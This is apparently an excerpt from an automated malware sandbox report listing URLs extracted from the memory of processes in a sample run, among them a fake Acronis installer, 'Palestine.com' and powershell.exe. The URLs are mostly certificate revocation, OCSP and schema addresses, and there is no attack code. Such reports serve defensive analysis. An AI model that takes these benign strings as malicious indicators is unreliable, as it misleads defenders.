                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://g.live.com/1LS3/msgsWOCIcon
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://g.msn.com
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://g.msn.com/1csauthx/authx
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://g.msn.com/1csauthx/authxhttp://messenger.msn.com/ct/getappcompat.aspx?lcid=%s
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://g.msn.com/7MEAPPSDIR/1??DI=9647&HL=7h
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://libusb.info
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://messenger.live.com/ws/2006/09/oim/Store2
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://messenger.live.com/ws/2006/09/oim/Store2jD
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://messenger.msn.com/ct/getappcompat.aspx?lcid=%s
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://messenger.msn.com/ws/2004/09/oim/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://messenger.msn.comh
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://msn.com
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe, 00000001.00000000.1249820381.0000000000409000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net02
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngd
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp, msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/07/utility
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2003/03/rm
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2003/06/secext
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/03/addressing
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                Source: powershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com02
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com05
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://web.resource.org/cc/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.acronis.com/V
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
